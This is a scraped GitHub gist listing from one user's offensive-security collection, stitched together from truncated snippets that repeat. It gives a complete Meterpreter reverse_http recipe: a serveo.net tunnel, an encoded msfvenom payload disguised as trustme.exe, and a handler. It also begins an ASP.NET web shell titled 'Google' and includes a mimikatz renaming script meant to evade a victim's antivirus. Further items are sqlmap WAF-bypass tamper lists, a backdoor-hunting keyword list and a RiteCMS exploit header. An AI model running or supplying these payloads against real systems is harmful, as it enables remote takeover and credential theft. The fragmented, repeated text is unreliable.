Faisal Fs ⚔️ faisalfs10x

## reverse_http_80.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                faisalfs10x
                / reverse_http_80.md
            
            
              Created
              October 11, 2019 12:14
                — forked from pawiromitchel/reverse_http_80.md
            
              
                Meterpreter over WAN
              
          
    Start the tunnel

Used autossh for persistant ssh session (reconnects when it breaks)

autossh -R trustme:80:localhost:80 serveo.net
Generate the payload

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_http LHOST=trustme.serveo.net LPORT=80 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe
Listen for incoming connections

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LHOST 0.0.0.0;set LPORT 80;run;"

  
## cengkerang.aspx
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>

<script runat="server">
    private const string mangga = "@lololo";
    private const string kepala = "<html>\n<head>\n<title>Google</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
    private const string kaki = "</body>\n</html>\n";
    /// <summary>
    ///

## router_b310.py
#Faisalfs10x
#!/usr/bin/env python
import time, subprocess
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from datetime import datetime

def main():


## seclist_malicious.txt
# strings for finding backdoor shells, rootkits, botnets, and exploitable functions
# grep -Rn "shell *(" /var/www
exec
passthru
shell_exec
system
phpinfo
base64_decode
chmod
mkdir

## sqlmap-tamper-scripts-evaluation.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                faisalfs10x
                / sqlmap-tamper-scripts-evaluation.md
            
            
              Created
              February 15, 2021 02:55
                — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
            
              
                SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF
              
          
    SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.

  
## sqlmap tamper scripts
https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

## pwd2NTLM.py
import hashlib
import argparse

parser = argparse.ArgumentParser(description='Password to NTLM')
parser.add_argument("-w","--wordlist",required=True, help = "wordlist file to be converted to NTLM")
args = parser.parse_args()
wordfile = args.wordlist

total_converted = 0
f = open(wordfile, "r")

## mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'

## RiteCMS - Arbitrary File Overwrite (Authenticated).txt
# Exploit Title: RiteCMS - Arbitrary File Overwrite (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP


## squid_proxy_tutorial.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                faisalfs10x
                / squid_proxy_tutorial.md
            
            
              Last active
              October 21, 2021 14:44
                — forked from jackblk/squid_proxy_tutorial.md
            
              
                Tutorial on how to setup a squid proxy with authentication.
              
          
    Note

This tutorial is for Ubuntu & Squid3. Use AWS, Google cloud, Digital Ocean or any services with Ubuntu to follow this tutorial.
Install squid & update

sudo apt-get update -y
sudo apt-get install squid3 -y
sudo apt-get install apache2-utils -y
	<%@ Page Language="C#" %>
	<%@ Import namespace="System.Diagnostics"%>
	<%@ Import Namespace="System.IO" %>

	<script runat="server">
	private const string mangga = "@lololo";
	private const string kepala = "<html>\n<head>\n<title>Google</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
	private const string kaki = "</body>\n</html>\n";
	/// <summary>
	///
	#Faisalfs10x
	#!/usr/bin/env python
	import time, subprocess
	from selenium import webdriver
	from selenium.webdriver.common.keys import Keys
	from selenium.webdriver.firefox.options import Options
	from datetime import datetime

	def main():
	# strings for finding backdoor shells, rootkits, botnets, and exploitable functions
	# grep -Rn "shell *(" /var/www
	exec
	passthru
	shell_exec
	system
	phpinfo
	base64_decode
	chmod
	mkdir
	https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	import hashlib
	import argparse

	parser = argparse.ArgumentParser(description='Password to NTLM')
	parser.add_argument("-w","--wordlist",required=True, help = "wordlist file to be converted to NTLM")
	args = parser.parse_args()
	wordfile = args.wordlist

	total_converted = 0
	f = open(wordfile, "r")
	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/candycrush
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/candycrush/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
	# Exploit Title: RiteCMS - Arbitrary File Overwrite (Authenticated)
	# Date: 2021-07-25
	# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
	# Vendor Homepage: https://ritecms.com/
	# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
	# Version: <= 3.1.0
	# Google Dork: intext:"Powered by RiteCMS"
	# Tested on: Windows 10, Ubuntu 18, XAMPP